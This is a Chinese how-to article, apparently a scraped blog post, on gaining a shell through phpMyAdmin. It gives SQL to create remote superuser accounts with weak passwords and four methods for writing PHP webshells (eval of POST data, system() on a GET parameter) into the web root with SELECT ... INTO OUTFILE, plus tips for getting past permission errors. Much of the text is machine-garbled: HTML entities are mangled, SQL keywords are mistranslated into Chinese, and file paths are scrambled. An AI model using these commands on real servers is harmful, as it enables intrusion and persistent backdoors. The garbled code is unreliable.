PHPmyadmin拿外壳的方法有哪些

  介绍

这篇文章将为大家详细讲解有关PHPmyadmin拿外壳的方法有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。

<强> PHPmyadmin修改用户密码

直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可

添加超级用户guetsec密码ooxx并且允许外连

GRANT  ALL  PRIVILEGES 提醒*。*,用& # 39;guetsec& # 39; @ # 39; % & # 39;, IDENTIFIED  BY  & # 39; ooxx& # 39;, WITH  GRANT 选择;

我们可以创建根账户设置密码

GRANT  ALL  PRIVILEGES 提醒*。*,用& # 39;根# 39;@ # 39;% & # 39;,IDENTIFIED  BY  & # 39; 123456 & # 39;, WITH  GRANT 选择;

这样就创建了根外联账户,密码123456,外链时用123456

拿外壳四种经典方法:

方法一:

CREATE  TABLE “mysql”。“研究”,(“7”,TEXT  NOT  NULL );   INSERT  INTO “mysql”。“研究”,(“7”,)VALUES  (& # 39; & lt; ? php  @eval_r ($ _POST[7]) ?祝辞& # 39;);   SELECT  7 onfrom  study  INTO  OUTFILE  & # 39; E: 7./里面/www/php # 39;;   - - - - -以上同时执行,在数据库:,mysql 下创建一个表名为:研究中,字段为7,导出到E: php/里面/www/7.   ,,,一句话连接密码:7

方法二:

读取文件内容:,,,,select  load_file (& # 39; E:/xamp/www/s.php& # 39;);   写一句话:,,,,select  & # 39; & lt; ? php  @eval_r ($ _POST [cmd]) ?祝辞& # 39;INTO  OUTFILE  & # 39; E:/xamp/www/study.php& # 39;   cmd执行权限:,,,,select  & # 39; & lt; ? php  echo  \ & # 39; & lt; pre> \ & # 39;;系统($ _GET [\ & # 39; cmd \ & # 39;]);, echo  \ & # 39; & lt;/pre> \ & # 39;,, ?祝辞& # 39;,INTO  OUTFILE  & # 39; E:/xamp/www/study.php& # 39;

方法三:

JhackJ版本PHPmyadmin拿壳

Create  TABLE  study  (cmd  text  NOT 空);   Insert  INTO  study  (cmd),值(& # 39;& lt; ? php  eval_r ($ _POST [cmd]) ?祝辞& # 39;);   select  cmd 得到study  into  outfile  & # 39; E: 7./里面/www/php # 39;;   ,,   Drop  TABLE  IF  EXISTS 研究;   ,,   & lt; ? php  eval_r ($ _POST [cmd]) ?比;   --------------------------------------------------------------------------------   & lt; ? php  @eval_r ($ _POST [cmd]) ?比;   ,,   CREATE  TABLE 研究(cmd  text  NOT  NULL ); #, MySQL 返回的查询结果为空(即零行)。   INSERT  INTO 研究(),cmd , VALUES  (& # 39; & lt; ? php  eval_r ($ _POST [cmd]) ?祝辞& # 39;);#,影响列数:1   SELECT  cmdFROM  study  INTO  OUTFILE  & # 39; E: 7./里面/www/php # 39;; #,影响列数:1   DROP  TABLE  IF  EXISTS 研究;#,MySQL 返回的查询结果为空(即零行)。

方法四:

select  load_file (& # 39; E:/xamp/www/study.php& # 39;);   select  & # 39; & lt; ? php  echo  \ & # 39; & lt; pre> \ & # 39;;系统($ _GET [\ & # 39; cmd \ & # 39;]);, echo  \ & # 39; & lt;/pre> \ & # 39;,, ?祝辞& # 39;,INTO  OUTFILE  & # 39; E:/xamp/www/study.php& # 39;

然后访问网站目录:http://www.2cto.com/study.php?cmd=dir

Phpmyadmin导出一句话时出现(Errcode: 13 -没有权限)

是对此目录没有权限,可以试试上级目录,或者下级目录

再不行试试nt引流

还有就是注意目录\

关于“Phpmyadmin拿外壳的方法有哪些”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看的到。

PHPmyadmin拿外壳的方法有哪些